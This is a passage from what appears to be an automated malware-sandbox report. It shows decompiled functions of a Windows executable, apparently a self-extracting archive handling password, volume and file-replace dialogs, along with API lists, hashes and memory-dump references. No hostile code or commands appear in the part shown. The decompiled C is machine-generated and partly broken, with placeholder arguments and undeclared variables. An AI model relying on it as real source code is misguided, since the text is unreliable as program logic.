              • Opcode Fuzzy Hash: f1e0ab8045a3d0367038975fc77f0a465b8fe371724f54e3bca17f795ebdc5a6
              • Instruction Fuzzy Hash: 57315CB1A05358AFDF21EF99D885AAEBFF8EF85710F1440A6F81497211D6709E40DBB0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D773B9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
              Download Yara Rule
              C-Code - Quality: 63%
              			E00D773B9(void* __ebx, void* __edx, void* __esi) {
				void* _t26;
				long _t32;
				void* _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t52;
				void* _t57;
				void* _t58;
				void* _t61;

				_t57 = __esi;
				_t52 = __edx;
				_t42 = __ebx;
				E00D8D870(E00DA1321, _t61);
				E00D8D940();
				 *((intOrPtr*)(_t61 - 0x20)) = 0;
				 *((intOrPtr*)(_t61 - 0x1c)) = 0;
				 *((intOrPtr*)(_t61 - 0x18)) = 0;
				 *((intOrPtr*)(_t61 - 0x14)) = 0;
				 *((char*)(_t61 - 0x10)) = 0;
				_t54 =  *((intOrPtr*)(_t61 + 8));
				_push(0);
				_push(0);
				 *((intOrPtr*)(_t61 - 4)) = 0;
				_push(_t61 - 0x20);
				if(E00D7399D( *((intOrPtr*)(_t61 + 8)), _t52) != 0) {
					if( *0xdb0042 == 0) {
						if(E00D77A15(L"SeSecurityPrivilege") != 0) {
							 *0xdb0041 = 1;
						}
						E00D77A15(L"SeRestorePrivilege");
						 *0xdb0042 = 1;
					}
					_push(_t57);
					_t58 = 7;
					if( *0xdb0041 != 0) {
						_t58 = 0xf;
					}
					_push(_t42);
					_t43 =  *((intOrPtr*)(_t61 - 0x20));
					_push(_t43);
					_push(_t58);
					_push( *((intOrPtr*)(_t61 + 0xc)));
					if( *0xdade80() == 0) {
						if(E00D7B32C( *((intOrPtr*)(_t61 + 0xc)), _t61 - 0x106c, 0x800) == 0) {
							L10:
							E00D76BF5(_t70, 0x52, _t54 + 0x1e,  *((intOrPtr*)(_t61 + 0xc)));
							_t32 = GetLastError();
							E00D8E214(_t32);
							if(_t32 == 5 && E00D7FC98() == 0) {
								E00D71567(_t61 - 0x6c, 0x18);
								E00D80A9F(_t61 - 0x6c);
							}
							E00D76E03(0xdb00e0, 1);
						} else {
							_t39 =  *0xdade80(_t61 - 0x106c, _t58, _t43);
							_t70 = _t39;
							if(_t39 == 0) {
								goto L10;
							}
						}
					}
				}
				_t26 = E00D7159C(_t61 - 0x20);
				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
				return _t26;
			}












              0x00d773b9
              0x00d773b9
              0x00d773b9
              0x00d773be
              0x00d773c8
              0x00d773d0
              0x00d773d3
              0x00d773d6
              0x00d773d9
              0x00d773dc
              0x00d773df
              0x00d773e4
              0x00d773e5
              0x00d773e6
              0x00d773ec
              0x00d773f4
              0x00d77401
              0x00d7740f
              0x00d77411
              0x00d77411
              0x00d7741d
              0x00d77422
              0x00d77422
              0x00d77430
              0x00d77433
              0x00d77434
              0x00d77438
              0x00d77438
              0x00d77439
              0x00d7743a
              0x00d7743d
              0x00d7743e
              0x00d7743f
              0x00d7744a
              0x00d77462
              0x00d77477
              0x00d77480
              0x00d77485
              0x00d77494
              0x00d7749c
              0x00d774ac
              0x00d774b4
              0x00d774b4
              0x00d774bd
              0x00d77464
              0x00d7746d
              0x00d77473
              0x00d77475
              0x00000000
              0x00000000
              0x00d77475
              0x00d77462
              0x00d774c3
              0x00d774c7
              0x00d774d0
              0x00d774da

              APIs
              • __EH_prolog.LIBCMT ref: 00D773BE
                • Part of subcall function 00D7399D: __EH_prolog.LIBCMT ref: 00D739A2
              • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00D77485
                • Part of subcall function 00D77A15: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D77A24
                • Part of subcall function 00D77A15: GetLastError.KERNEL32 ref: 00D77A6A
                • Part of subcall function 00D77A15: CloseHandle.KERNEL32(?), ref: 00D77A79
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
              • String ID: SeRestorePrivilege$SeSecurityPrivilege
              • API String ID: 3813983858-639343689
              • Opcode ID: 765f76c4b261a9ecac7fc1f01a1c7c18d6cb9c462d64f35ecf795f4dff42287c
              • Instruction ID: 0d2c4dbaa3e24f3f38743ab22a8f0a20350537f22c98f606536d84aa2b424e80
              • Opcode Fuzzy Hash: 765f76c4b261a9ecac7fc1f01a1c7c18d6cb9c462d64f35ecf795f4dff42287c
              • Instruction Fuzzy Hash: AD316171A04208AADF20EB68DC41BFE7F79EB55714F04C455F44DE7292E7748A448BB1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D89B8D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
              Download Yara Rule
              C-Code - Quality: 62%
              			E00D89B8D(void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR** _a16) {
				void* _t12;
				void* _t16;
				void* _t22;
				WCHAR** _t24;
				void* _t25;
				intOrPtr _t27;
				void* _t28;
				struct HWND__* _t30;
				signed short _t31;

				_t24 = _a16;
				_t31 = _a12;
				_t30 = _a4;
				_t27 = _a8;
				if(E00D712D7(__edx, _t30, _t27, _t31, _t24, L"ASKNEXTVOL", 0, 0) != 0) {
					L14:
					__eflags = 1;
					return 1;
				}
				_t28 = _t27 - 0x110;
				if(_t28 == 0) {
					_push( *_t24);
					 *0xdcfe38 = _t24;
					L13:
					SetDlgItemTextW(_t30, 0x66, ??);
					goto L14;
				}
				if(_t28 != 1) {
					L6:
					return 0;
				}
				_t12 = (_t31 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t30, 0x66,  *( *0xdcfe38), ( *0xdcfe38)[1]);
					_push(1);
					L10:
					EndDialog(_t30, ??);
					goto L14;
				}
				_t16 = _t12 - 1;
				if(_t16 == 0) {
					_push(0);
					goto L10;
				}
				if(_t16 == 0x65) {
					_push(0);
					_push(E00D7B943(__eflags,  *( *0xdcfe38)));
					_push( *( *0xdcfe38));
					_push(E00D7DA42(_t25, 0x8e));
					_t22 = E00D710B0(_t30);
					__eflags = _t22;
					if(_t22 == 0) {
						goto L14;
					}
					_push( *( *0xdcfe38));
					goto L13;
				}
				goto L6;
			}












              0x00d89b8e
              0x00d89b93
              0x00d89b98
              0x00d89b9d
              0x00d89bb5
              0x00d89c45
              0x00d89c47
              0x00000000
              0x00d89c47
              0x00d89bbb
              0x00d89bc1
              0x00d89c34
              0x00d89c36
              0x00d89c3c
              0x00d89c3f
              0x00000000
              0x00d89c3f
              0x00d89bc6
              0x00d89bda
              0x00000000
              0x00d89bda
              0x00d89bcb
              0x00d89bce
              0x00d89c2a
              0x00d89c30
              0x00d89c14
              0x00d89c15
              0x00000000
              0x00d89c15
              0x00d89bd0
              0x00d89bd3
              0x00d89c12
              0x00000000
              0x00d89c12
              0x00d89bd8
              0x00d89be3
              0x00d89bec
              0x00d89bf2
              0x00d89bfe
              0x00d89c00
              0x00d89c05
              0x00d89c07
              0x00000000
              0x00000000
              0x00d89c0e
              0x00000000
              0x00d89c0e
              0x00000000

              APIs
                • Part of subcall function 00D712D7: GetDlgItem.USER32(00000000,00003021), ref: 00D7131B
                • Part of subcall function 00D712D7: SetWindowTextW.USER32(00000000,00DA22E4), ref: 00D71331
              • EndDialog.USER32(?,00000001), ref: 00D89C15
              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00D89C2A
              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00D89C3F
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ItemText$DialogWindow
              • String ID: ASKNEXTVOL
              • API String ID: 445417207-3402441367
              • Opcode ID: 6cc0e5ae31612cb36a289dc9106fecdd6ae6e24affb24ae99faaf339734faee1
              • Instruction ID: 1e822bedb82fb1f0d43ebdd17ab0cc15ddee8c710404562380ef5e90b86ab37c
              • Opcode Fuzzy Hash: 6cc0e5ae31612cb36a289dc9106fecdd6ae6e24affb24ae99faaf339734faee1
              • Instruction Fuzzy Hash: 58119333244241AFD611BF68DD59FB6BBAAEB4B700F0C4010F281DA1B2C762D9469735
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D7CE52, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
              Download Yara Rule
              C-Code - Quality: 58%
              			E00D7CE52(void* __ebx, void* __ecx, void* __edi) {
				void* __esi;
				intOrPtr _t26;
				signed int* _t30;
				void* _t31;
				void* _t34;
				void* _t42;
				void* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t50;

				_t44 = __edi;
				_t43 = __ecx;
				_t42 = __ebx;
				_t48 = _t49 - 0x64;
				_t50 = _t49 - 0xac;
				_t46 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x2c)) > 0) {
					 *((intOrPtr*)(_t48 + 0x5c)) =  *((intOrPtr*)(_t48 + 0x6c));
					 *((char*)(_t48 + 8)) = 0;
					 *((intOrPtr*)(_t48 + 0x60)) = _t48 + 8;
					if( *((intOrPtr*)(_t48 + 0x74)) != 0) {
						E00D811FA( *((intOrPtr*)(_t48 + 0x74)), _t48 - 0x48, 0x50);
					}
					_t26 =  *((intOrPtr*)(_t48 + 0x70));
					if(_t26 == 0) {
						E00D7FA56(_t48 + 8, "s", 0x50);
					} else {
						_t34 = _t26 - 1;
						if(_t34 == 0) {
							_push(_t48 - 0x48);
							_push("$%s");
							goto L9;
						} else {
							if(_t34 == 1) {
								_push(_t48 - 0x48);
								_push("@%s");
								L9:
								_push(0x50);
								_push(_t48 + 8);
								E00D7D9DC();
								_t50 = _t50 + 0x10;
							}
						}
					}
					_t16 = _t46 + 0x18; // 0x63
					_t18 = _t46 + 0x14; // 0x1090cd0
					_t30 = E00D94E71(_t42, _t43, _t44, _t46, _t48 + 0x58,  *_t18,  *_t16, 4, E00D7CC88);
					if(_t30 == 0) {
						goto L1;
					} else {
						_t20 = 0xdad158 +  *_t30 * 0xc; // 0xda33e0
						E00D954E0( *((intOrPtr*)(_t48 + 0x78)),  *_t20,  *((intOrPtr*)(_t48 + 0x7c)));
						_t31 = 1;
					}
				} else {
					L1:
					_t31 = 0;
				}
				return _t31;
			}














              0x00d7ce52
              0x00d7ce52
              0x00d7ce52
              0x00d7ce53
              0x00d7ce57
              0x00d7ce5e
              0x00d7ce64
              0x00d7ce74
              0x00d7ce7a
              0x00d7ce7e
              0x00d7ce81
              0x00d7ce8c
              0x00d7ce8c
              0x00d7ce94
              0x00d7ce97
              0x00d7ced2
              0x00d7ce99
              0x00d7ce99
              0x00d7ce9c
              0x00d7ceb1
              0x00d7ceb2
              0x00000000
              0x00d7ce9e
              0x00d7cea1
              0x00d7cea6
              0x00d7cea7
              0x00d7ceb7
              0x00d7ceba
              0x00d7cebc
              0x00d7cebd
              0x00d7cec2
              0x00d7cec2
              0x00d7cea1
              0x00d7ce9c
              0x00d7cede
              0x00d7cee4
              0x00d7cee8
              0x00d7cef2
              0x00000000
              0x00d7cef8
              0x00d7cefe
              0x00d7cf07
              0x00d7cf0f
              0x00d7cf0f
              0x00d7ce66
              0x00d7ce66
              0x00d7ce66
              0x00d7ce66
              0x00d7cf16

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: __fprintf_l_strncpy
              • String ID: $%s$@%s
              • API String ID: 1857242416-834177443
              • Opcode ID: 8f71148d73772611ea53c7693801de29da1af76bacf12f42229a50a56adb6361
              • Instruction ID: e35b17ce782ddaf94f7e90b2a33679fd8229218a7a68045f9cc0f7a3ce108e64
              • Opcode Fuzzy Hash: 8f71148d73772611ea53c7693801de29da1af76bacf12f42229a50a56adb6361
              • Instruction Fuzzy Hash: 2D218E72450308AEDF20DFA4CC05FEE3BA8EF05700F08802AFA1896592F331D6599B71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8A0B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
              Download Yara Rule
              C-Code - Quality: 83%
              			E00D8A0B0(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				short _v260;
				void* __ebx;
				void* _t15;
				signed short _t24;
				struct HWND__* _t28;
				intOrPtr _t29;
				void* _t30;

				_t24 = _a12;
				_t29 = _a8;
				_t28 = _a4;
				if(E00D712D7(__edx, _t28, _t29, _t24, _a16, L"GETPASSWORD1", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t30 = _t29 - 0x110;
				if(_t30 == 0) {
					SetDlgItemTextW(_t28, 0x67, _a16);
					goto L10;
				}
				if(_t30 != 1) {
					L5:
					return 0;
				}
				_t15 = (_t24 & 0x0000ffff) - 1;
				if(_t15 == 0) {
					GetDlgItemTextW(_t28, 0x66,  &_v260, 0x80);
					E00D7E90C(_t24, 0xdc5c00,  &_v260);
					E00D7E957( &_v260, 0x80);
					_push(1);
					L7:
					EndDialog(_t28, ??);
					goto L10;
				}
				if(_t15 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}










              0x00d8a0ba
              0x00d8a0be
              0x00d8a0c2
              0x00d8a0db
              0x00d8a14a
              0x00000000
              0x00d8a14c
              0x00d8a0dd
              0x00d8a0e3
              0x00d8a144
              0x00000000
              0x00d8a144
              0x00d8a0e8
              0x00d8a0f7
              0x00000000
              0x00d8a0f7
              0x00d8a0ed
              0x00d8a0f0
              0x00d8a116
              0x00d8a128
              0x00d8a135
              0x00d8a13a
              0x00d8a0fd
              0x00d8a0fe
              0x00000000
              0x00d8a0fe
              0x00d8a0f5
              0x00d8a0fb
              0x00000000
              0x00d8a0fb
              0x00000000

              APIs
                • Part of subcall function 00D712D7: GetDlgItem.USER32(00000000,00003021), ref: 00D7131B
                • Part of subcall function 00D712D7: SetWindowTextW.USER32(00000000,00DA22E4), ref: 00D71331
              • EndDialog.USER32(?,00000001), ref: 00D8A0FE
              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00D8A116
              • SetDlgItemTextW.USER32(?,00000067,?), ref: 00D8A144
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ItemText$DialogWindow
              • String ID: GETPASSWORD1
              • API String ID: 445417207-3292211884
              • Opcode ID: e611d418b4ce38fcafb89db9d385b56910ee3b98ae0c32ba6d74463fa22fdcd0
              • Instruction ID: 02c1f0717373cc40d16855ad25fca4d22223f66e3f4751b24af959ac908ab044
              • Opcode Fuzzy Hash: e611d418b4ce38fcafb89db9d385b56910ee3b98ae0c32ba6d74463fa22fdcd0
              • Instruction Fuzzy Hash: 3A1108329003197AEB21AE6C9C4DFFB377DEB0A710F040052FA8AF21C4C665D95087B2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D7B1B7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
              Download Yara Rule
              C-Code - Quality: 70%
              			E00D7B1B7(void* __ecx, void* __eflags, signed short* _a4, short* _a8, intOrPtr _a12) {
				short _t10;
				void* _t13;
				signed int _t14;
				short* _t20;
				void* _t23;
				signed short* _t27;
				signed int _t29;
				signed int _t31;

				_t20 = _a8;
				_t27 = _a4;
				 *_t20 = 0;
				_t10 = E00D7B4C6(_t27);
				if(_t10 == 0) {
					_t29 = 0x5c;
					if( *_t27 == _t29 && _t27[1] == _t29) {
						_push(_t29);
						_push( &(_t27[2]));
						_t10 = E00D90BB8(__ecx);
						_pop(_t23);
						if(_t10 != 0) {
							_push(_t29);
							_push(_t10 + 2);
							_t13 = E00D90BB8(_t23);
							if(_t13 == 0) {
								_t14 = E00D92B33(_t27);
							} else {
								_t14 = (_t13 - _t27 >> 1) + 1;
							}
							asm("sbb esi, esi");
							_t31 = _t29 & _t14;
							E00D94DDA(_t20, _t27, _t31);
							_t10 = 0;
							 *((short*)(_t20 + _t31 * 2)) = 0;
						}
					}
					return _t10;
				}
				return E00D73E41(_t20, _a12, L"%c:\\",  *_t27 & 0x0000ffff);
			}











              0x00d7b1b8
              0x00d7b1bf
              0x00d7b1c4
              0x00d7b1c7
              0x00d7b1ce
              0x00d7b1eb
              0x00d7b1ef
              0x00d7b1fa
              0x00d7b1fb
              0x00d7b1fc
              0x00d7b202
              0x00d7b205
              0x00d7b20a
              0x00d7b20b
              0x00d7b20c
              0x00d7b215
              0x00d7b21f
              0x00d7b217
              0x00d7b21b
              0x00d7b21b
              0x00d7b229
              0x00d7b22b
              0x00d7b230
              0x00d7b238
              0x00d7b23a
              0x00d7b23a
              0x00d7b205
              0x00000000
              0x00d7b23e
              0x00000000

              APIs
              • _swprintf.LIBCMT ref: 00D7B1DE
                • Part of subcall function 00D73E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D73E54
              • _wcschr.LIBVCRUNTIME ref: 00D7B1FC
              • _wcschr.LIBVCRUNTIME ref: 00D7B20C
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _wcschr$__vswprintf_c_l_swprintf
              • String ID: %c:\
              • API String ID: 525462905-3142399695
              • Opcode ID: c83fd10a1592e243f081dda09cd125fed73b3acdb9a25d682958c444bffa8845
              • Instruction ID: 292b1bd7586eafc9c5740585c524b84d58032d6ceea3f736d104cc70bacedeeb
              • Opcode Fuzzy Hash: c83fd10a1592e243f081dda09cd125fed73b3acdb9a25d682958c444bffa8845
              • Instruction Fuzzy Hash: 7E01D2235013127A9F206B659C46E7FA7ACEE96770B94C40BF888C7482FB30D854C2B5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D80326, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
              Download Yara Rule
              C-Code - Quality: 74%
              			E00D80326(long* __ecx, long _a4) {
				void* __esi;
				void* __ebp;
				long _t11;
				void* _t14;
				long _t23;
				long* _t25;

				_t19 = __ecx;
				_t11 = _a4;
				_t25 = __ecx;
				_t23 = 0x40;
				 *__ecx = _t11;
				if(_t11 > _t23) {
					 *__ecx = _t23;
				}
				if( *_t25 == 0) {
					 *_t25 = 1;
				}
				_t25[0x41] = 0;
				if( *_t25 > _t23) {
					 *_t25 = _t23;
				}
				_t3 =  &(_t25[0xc8]); // 0x320
				_t25[0xc5] = 0;
				InitializeCriticalSection(_t3);
				_t25[0xc6] = CreateSemaphoreW(0, 0, _t23, 0);
				_t14 = CreateEventW(0, 1, 1, 0);
				_t25[0xc7] = _t14;
				if(_t25[0xc6] == 0 || _t14 == 0) {
					_push(L"\nThread pool initialization failed.");
					_push(0xdb00e0);
					E00D76CC9(E00D76CCE(_t19), 0xdb00e0, _t25, 2);
				}
				_t25[0xc3] = 0;
				_t25[0xc4] = 0;
				_t25[0x42] = 0;
				return _t25;
			}









              0x00d80326
              0x00d80326
              0x00d8032e
              0x00d80332
              0x00d80333
              0x00d80337
              0x00d80339
              0x00d80339
              0x00d80342
              0x00d80344
              0x00d80344
              0x00d80346
              0x00d8034e
              0x00d80350
              0x00d80350
              0x00d80352
              0x00d80358
              0x00d8035f
              0x00d80373
              0x00d80379
              0x00d8037f
              0x00d8038b
              0x00d80391
              0x00d8039b
              0x00d803a7
              0x00d803a7
              0x00d803ad
              0x00d803b5
              0x00d803bb
              0x00d803c4

              APIs
              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00D7A865,00000008,00000000,?,?,00D7C802,?,00000000,?,00000001,?), ref: 00D8035F
              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00D7A865,00000008,00000000,?,?,00D7C802,?,00000000), ref: 00D80369
              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00D7A865,00000008,00000000,?,?,00D7C802,?,00000000), ref: 00D80379
              Strings
              • Thread pool initialization failed., xrefs: 00D80391
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Create$CriticalEventInitializeSectionSemaphore
              • String ID: Thread pool initialization failed.
              • API String ID: 3340455307-2182114853
              • Opcode ID: b9f47619c57aa36c09b45fde27a4e99c70ca39e972e4dda3e1348f559d3d7fcb
              • Instruction ID: 4beb31632a68465cd190c3989613f7bc00450480b9a90b3c781707b1b13423e1
              • Opcode Fuzzy Hash: b9f47619c57aa36c09b45fde27a4e99c70ca39e972e4dda3e1348f559d3d7fcb
              • Instruction Fuzzy Hash: C21170B1500708AFC3216F6A9C84AABFFECEB95754F14482EF1DA82201E6716984CB74
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8C96E, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D8C96E(long _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				long _v0;
				_Unknown_base(*)()* _t16;
				int _t22;
				WCHAR* _t25;

				 *0xdcce10 = _a12;
				 *0xdcce14 = _a16;
				 *0xdb75f4 = _a20;
				if( *0xdb75d3 == 0) {
					if( *0xdb75d2 == 0) {
						_t16 = E00D8AFB9;
						_t25 = L"REPLACEFILEDLG";
						while(1) {
							_t22 = DialogBoxParamW( *0xdb0064, _t25,  *0xdb75c8, _t16, _a4);
							if(_t22 != 4) {
								break;
							}
							if(DialogBoxParamW( *0xdb0060, L"RENAMEDLG",  *0xdb75d8, E00D8C2A7, _v0) != 0) {
								break;
							}
						}
						return _t22;
					}
					return 1;
				}
				return 0;
			}







              0x00d8c979
              0x00d8c982
              0x00d8c98b
              0x00d8c990
              0x00d8c99d
              0x00d8c9ae
              0x00d8c9b3
              0x00d8c9da
              0x00d8c9ee
              0x00d8c9f3
              0x00000000
              0x00000000
              0x00d8c9d8
              0x00000000
              0x00000000
              0x00d8c9d8
              0x00000000
              0x00d8c9fa
              0x00000000
              0x00d8c9a1
              0x00000000

              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID: RENAMEDLG$REPLACEFILEDLG
              • API String ID: 0-56093855
              • Opcode ID: 8fafc28c121ad64d9b0099e3bdc2d398794cd8d0e53f08059ce4f37ed741a923
              • Instruction ID: 481e4f24febcf11814658fd69d0196c14c1a7d36503acc61304406dff8d734d0
              • Opcode Fuzzy Hash: 8fafc28c121ad64d9b0099e3bdc2d398794cd8d0e53f08059ce4f37ed741a923
              • Instruction Fuzzy Hash: 24019E72228346FFC310BB19ED40E27BBE9EB85761F041566F582E2320D63198149B71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D98749, Relevance: 6.3, APIs: 4, Instructions: 305COMMON
              Download Yara Rule
              C-Code - Quality: 75%
              			E00D98749(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E00D93356(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
